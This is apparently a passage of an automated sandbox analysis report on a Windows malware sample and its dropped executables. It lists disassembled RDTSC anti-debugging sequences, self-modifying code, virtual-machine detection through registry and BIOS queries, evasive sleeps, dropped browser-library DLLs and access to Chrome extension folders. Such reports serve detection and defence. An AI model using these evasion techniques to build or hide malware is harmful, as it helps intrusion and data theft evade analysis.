Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA6F2 second address: FEA6F7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA6F7 second address: FEA717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dl, 06h 0x0000000a push 00000000h 0x0000000c and ch, FFFFFFFDh 0x0000000f push E97CAC80h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF40CBDB92Ah 0x0000001b rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA717 second address: FEA78E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF40C70B05Ch 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 16835400h 0x00000012 mov edi, 082A5C7Fh 0x00000017 push 00000003h 0x00000019 mov edx, dword ptr [ebp+122D3597h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FF40C70B058h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b and ecx, dword ptr [ebp+122D1C4Fh] 0x00000041 push 00000003h 0x00000043 jmp 00007FF40C70B064h 0x00000048 call 00007FF40C70B059h 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 jnl 00007FF40C70B056h 0x00000056 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA78E second address: FEA792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA792 second address: FEA79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA79C second address: FEA7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA7A0 second address: FEA7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA7A4 second address: FEA7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA7B2 second address: FEA7D0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF40C70B058h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FF40C70B05Ch 0x00000018 jno 00007FF40C70B056h 0x0000001e rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA7D0 second address: FEA7D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA7D5 second address: FEA7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA7E5 second address: FEA7FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FF40CBDB926h 0x00000015 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA7FA second address: FEA800 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA90B second address: FEA915 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA915 second address: FEA954 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF40C70B05Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007FF40C70B064h 0x00000010 and dl, FFFFFFFBh 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 adc dx, EF36h 0x0000001b push B74AE675h 0x00000020 push eax 0x00000021 push edx 0x00000022 jc 00007FF40C70B05Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA954 second address: FEA958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA958 second address: FEA95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA95E second address: FEA962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA962 second address: FEA9F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 48B51A0Bh 0x0000000f mov dword ptr [ebp+122D3661h], eax 0x00000015 push 00000003h 0x00000017 jp 00007FF40C70B05Ch 0x0000001d mov edi, dword ptr [ebp+122D2951h] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007FF40C70B058h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f mov si, ax 0x00000042 jmp 00007FF40C70B066h 0x00000047 jmp 00007FF40C70B05Bh 0x0000004c push 00000003h 0x0000004e add si, 47D1h 0x00000053 jmp 00007FF40C70B05Ch 0x00000058 push 72DC89A8h 0x0000005d jp 00007FF40C70B064h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA9F0 second address: FEA9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA9F6 second address: FEAA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 4D237658h 0x0000000c mov dword ptr [ebp+122D32C4h], ebx 0x00000012 lea ebx, dword ptr [ebp+1245F5E8h] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FF40C70B058h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov edi, dword ptr [ebp+122D2B15h] 0x00000038 pushad 0x00000039 sub esi, dword ptr [ebp+122D29A5h] 0x0000003f mov bx, 1394h 0x00000043 popad 0x00000044 push eax 0x00000045 pushad 0x00000046 push ebx 0x00000047 push eax 0x00000048 pop eax 0x00000049 pop ebx 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEAB03 second address: FEAB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007FF40CBDB933h 0x00000010 jmp 00007FF40CBDB92Ah 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007FF40CBDB92Dh 0x0000001f jmp 00007FF40CBDB935h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF40CBDB934h 0x0000002c rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FFD27E second address: FFD282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FD2147 second address: FD2166 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF40CBDB92Ch 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FD2166 second address: FD216A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100964F second address: 1009655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1009910 second address: 1009916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1009916 second address: 100991C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1009CFD second address: 1009D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1009D01 second address: 1009D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b ja 00007FF40CBDB926h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1009D13 second address: 1009D32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push ebx 0x00000007 jmp 00007FF40C70B066h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1009D32 second address: 1009D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FF40CBDB92Ah 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100A177 second address: 100A17B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100A17B second address: 100A19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF40CBDB938h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100A5FC second address: 100A602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100A602 second address: 100A607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100A607 second address: 100A626 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF40C70B063h 0x00000008 jmp 00007FF40C70B05Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FF40C70B056h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100A626 second address: 100A62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FD3CC9 second address: FD3CE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF40C70B064h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100AD78 second address: 100ADAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b jno 00007FF40CBDB92Ch 0x00000011 pushad 0x00000012 jmp 00007FF40CBDB936h 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100ADAA second address: 100ADC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40C70B05Eh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100ADC6 second address: 100ADCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100ADCA second address: 100ADD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF40C70B056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100ADD9 second address: 100ADE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100ADE0 second address: 100ADEA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF40C70B062h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100AF3D second address: 100AF5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB92Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jnl 00007FF40CBDB926h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100AF5C second address: 100AF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100D620 second address: 100D62F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100DDEB second address: 100DE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40C70B067h 0x00000009 popad 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnp 00007FF40C70B05Ch 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 push eax 0x00000019 jmp 00007FF40C70B066h 0x0000001e pop eax 0x0000001f push ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100DE36 second address: 100DE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF40CBDB92Bh 0x00000013 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 100DE4F second address: 100DE6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1012437 second address: 101246F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB938h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF40CBDB939h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FDC22D second address: FDC233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1015889 second address: 1015899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF40CBDB92Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1015F61 second address: 1015F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 10160E9 second address: 10160ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 10160ED second address: 10160F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1018DCE second address: 1018DD4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: 1019BB8 second address: 1019BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 63F98A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 80FA25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7F978D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8777E7 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Special instruction interceptor: First address: E5EB54 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Special instruction interceptor: First address: 1017485 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 101EB54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11D7485 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Special instruction interceptor: First address: 10C917 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Special instruction interceptor: First address: 2B48EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Special instruction interceptor: First address: 33E668 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Code function: 24_2_04D103A3 rdtsc 24_2_04D103A3
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1009009001\ead1a5c329.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 1824 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1796 Thread sleep time: -46023s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5840 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3988 Thread sleep time: -46023s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3892 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1160 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8728 Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8728 Thread sleep time: -2490000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8728 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe TID: 7940 Thread sleep time: -60000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Last function: Thread delayed
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA5C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6CA5C930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
